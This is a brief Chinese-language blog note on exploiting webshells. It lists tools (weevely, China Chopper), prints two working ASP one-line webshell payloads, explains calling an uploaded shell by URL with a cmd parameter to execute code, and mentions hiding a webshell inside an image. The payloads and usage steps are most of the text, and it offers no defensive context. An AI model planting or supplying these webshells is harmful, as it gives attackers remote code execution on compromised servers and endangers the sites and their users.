webshell利用

2次阅读

共计 186 个字符,预计需要花费 1 分钟才能阅读完成。

一句话工具
weevely,中国菜刀

asp 一句话木马
<%execute request(“value”)%>

我们上传了一句话木马后,可用中国菜刀进行连接
<%eval request(“cmd”)%>

原理:执行 http://xxxx/a.asp?cmd=phpinfo()
a.asp 是一句话木马所在的位置

制作图片一句话
C32asm

抓 http 包
wsexplorer 根据应用显示抓的包

正文完
 0